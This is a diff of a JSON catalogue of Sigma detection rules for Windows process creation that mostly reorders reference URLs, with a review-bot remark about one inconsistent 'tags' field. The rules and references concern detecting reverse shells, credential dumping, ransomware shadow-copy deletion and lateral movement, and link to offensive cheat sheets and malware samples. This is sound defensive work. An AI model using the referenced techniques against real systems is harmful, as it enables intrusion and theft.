"logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/mandiant/SharPersist", "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", + "https://github.com/mandiant/SharPersist", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml" ], "tags": [ 
@@ -37438,8 +37438,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/BloodHoundAD/BloodHound", "https://github.com/BloodHoundAD/SharpHound", + "https://github.com/BloodHoundAD/BloodHound", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml" ], "tags": [ @@ -37506,8 +37506,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", + "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml" ], "tags": [ @@ -37575,8 +37575,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c2_sliver.yml" ], "tags": [ 
@@ -37745,8 +37745,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", "https://twitter.com/Oddvarmoe/status/1270633613449723905", + "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal.yml" ], "tags": [ @@ -37871,8 +37871,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.youtube.com/watch?v=ro2QuZTIMBM", "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.youtube.com/watch?v=ro2QuZTIMBM", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml" ], "tags": [ @@ -37928,11 +37928,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://isc.sans.edu/diary/22264", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml" ], "tags": [ 
@@ -37975,9 +37975,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/nas_bench/status/1534915321856917506", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", "https://twitter.com/nas_bench/status/1534916659676422152", - "https://twitter.com/nas_bench/status/1534915321856917506", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml" ], "tags": [ @@ -38012,8 +38012,8 @@ "logsource.product": "windows", "refs": [ "https://www.nirsoft.net/utils/nircmd.html", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml" ], "tags": [ @@ -38275,8 +38275,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html", + "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_detection.yml" ], "tags": [ 
@@ -38586,9 +38586,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", "https://github.com/binderlabs/DirCreate2System", "https://www.echotrail.io/insights/search/wermgr.exe", + "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml" ], "tags": "No established tags" @@ -38643,8 +38643,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ss64.com/nt/cmd.html", "https://twitter.com/cyb3rops/status/1562072617552678912", + "https://ss64.com/nt/cmd.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml" ], "tags": [ @@ -38677,10 +38677,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", - "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://redcanary.com/blog/raspberry-robin/", + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://twitter.com/Hexacorn/status/1187143326673330176", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml" ], "tags": [ 
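Review bot: The context line `"tags": "No established tags"` after the refs of proc_creation_win_susp_wermgr.yml gives `tags` a string value, while every other rule entry in these hunks uses an array (`"tags": [`), so a consumer that iterates tags may end up looping over characters or failing on that entry. The commit does not touch this line, but the generator should emit `"tags": []` (or omit the key) when a rule has no tags, so the field keeps one type across the whole cluster. The rule object containing it starts and ends outside the hunk.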
@@ -38747,8 +38747,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ss64.com/nt/dsacls.html", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://ss64.com/nt/dsacls.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" ], "tags": [ @@ -38815,9 +38815,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gpresult.yml" ], 
@@ -38913,8 +38913,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_lateralization.yml" ], @@ -39079,8 +39079,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml" ], @@ -39342,9 +39342,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/", "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100", "https://twitter.com/ClearskySec/status/960924755355369472", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml" ], "tags": [ 
@@ -39437,8 +39437,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/", "https://www.vmray.com/analyses/5ad401c3a568/report/overview.html", + "https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_muddywater_dnstunnel.yml" ], "tags": [ @@ -39611,8 +39611,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powercfg.yml" ], "tags": [ @@ -39636,9 +39636,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.poweradmin.com/paexec/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml" ], "tags": [ 
@@ -39671,8 +39671,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml" ], "tags": [ @@ -39705,8 +39705,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", "https://twitter.com/SBousseaden/status/1278977301745741825", + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml" ], "tags": [ 
@@ -39772,14 +39772,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", - "https://reaqta.com/2017/12/mavinject-microsoft-injector/", - "https://github.com/SigmaHQ/sigma/issues/3742", - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://twitter.com/gN3mes1s/status/941315826107510784", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://github.com/SigmaHQ/sigma/issues/3742", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" ], "tags": [ 
@@ -39821,8 +39821,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" ], @@ -39915,9 +39915,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://adepts.of0x.cc/netsh-portproxy-code/", "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://www.dfirnotes.net/portproxy_detection/", + "https://adepts.of0x.cc/netsh-portproxy-code/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml" ], "tags": [ @@ -40117,8 +40117,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", "https://twitter.com/SBousseaden/status/1207671369963646976", + "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml" ], "tags": [ 
@@ -40205,11 +40205,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", + "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml" ], @@ -40260,8 +40260,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_html_help_spawn.yml" ], 
@@ -40390,8 +40390,8 @@ "logsource.product": "windows", "refs": [ "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml" ], "tags": [ @@ -40434,10 +40434,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", "https://twitter.com/max_mal_/status/1542461200797163522", "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", + "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml" ], "tags": [ @@ -40470,8 +40470,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1477925112561209344", "https://twitter.com/wdormann/status/1478011052130459653?s=20", + "https://twitter.com/0gtweet/status/1477925112561209344", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_format.yml" ], "tags": [ 
@@ -40494,9 +40494,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", - "https://ss64.com/nt/dsacls.html", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://ss64.com/nt/dsacls.html", + "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" ], "tags": [ @@ -40606,8 +40606,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/10/08/ryuks-return/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://thedfirreport.com/2020/10/08/ryuks-return/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml" ], "tags": [ @@ -40641,8 +40641,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", - "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", + "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_service_account_password_dumped.yml" ], "tags": [ 
@@ -40769,9 +40769,9 @@ "logsource.product": "windows", "refs": [ "https://youtu.be/5mqid-7zp8k?t=2481", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml" ], "tags": [ @@ -40925,9 +40925,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", "https://twitter.com/_felamos/status/1204705548668555264", "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet.yml" ], "tags": [ @@ -40960,8 +40960,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" ], "tags": [ 
@@ -41199,8 +41199,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html",
 "https://github.com/OTRF/detection-hackathon-apt29/issues/17",
+ "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml"
 ],
 "tags": [
@@ -41290,8 +41290,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/subTee/status/1216465628946563073",
 "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26",
+ "https://twitter.com/subTee/status/1216465628946563073",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_task_folder_evasion.yml"
 ],
 "tags": [
@@ -41358,8 +41358,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20",
 "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
+ "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml"
 ],
 "tags": [
@@ -41472,8 +41472,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120",
 "https://twitter.com/filip_dragovic/status/1590052248260055041",
+ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120",
 "https://twitter.com/filip_dragovic/status/1590104354727436290",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml"
 ],
@@ -41529,8 +41529,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/",
- "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
 "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/",
+ "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml"
 ],
 "tags": [
@@ -41563,8 +41563,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=DvVrzeZ1OcGiWowbhPV8Lg",
 "https://twitter.com/mrd0x/status/1511489821247684615",
+ "https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=DvVrzeZ1OcGiWowbhPV8Lg",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml"
 ],
 "tags": [
@@ -41598,8 +41598,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://securelist.com/muddywater/88059/",
 "https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection",
+ "https://securelist.com/muddywater/88059/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml"
 ],
 "tags": [
@@ -41708,10 +41708,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.activecyber.us/activelabs/windows-uac-bypass",
 "https://twitter.com/ReaQta/status/1222548288731217921",
 "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/",
 "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html",
+ "https://www.activecyber.us/activelabs/windows-uac-bypass",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml"
 ],
 "tags": [
@@ -41745,8 +41745,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a",
 "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/",
+ "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a",
 "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml"
 ],
@@ -41780,9 +41780,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.python.org/3/using/cmdline.html#cmdoption-c",
 "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
 "https://www.revshells.com/",
- "https://docs.python.org/3/using/cmdline.html#cmdoption-c",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml"
 ],
 "tags": [
@@ -42146,8 +42146,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/PhilipTsukerman/status/992021361106268161",
 "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/",
+ "https://twitter.com/PhilipTsukerman/status/992021361106268161",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml"
 ],
 "tags": [
@@ -42214,14 +42214,14 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/",
- "https://blog.talosintelligence.com/2017/05/wannacry.html",
- "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://github.com/Neo23x0/Raccine#the-process",
- "https://redcanary.com/blog/intelligence-insights-october-2021/",
 "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
+ "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/",
+ "https://github.com/Neo23x0/Raccine#the-process",
+ "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
+ "https://blog.talosintelligence.com/2017/05/wannacry.html",
+ "https://redcanary.com/blog/intelligence-insights-october-2021/",
+ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
 "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml"
 ],
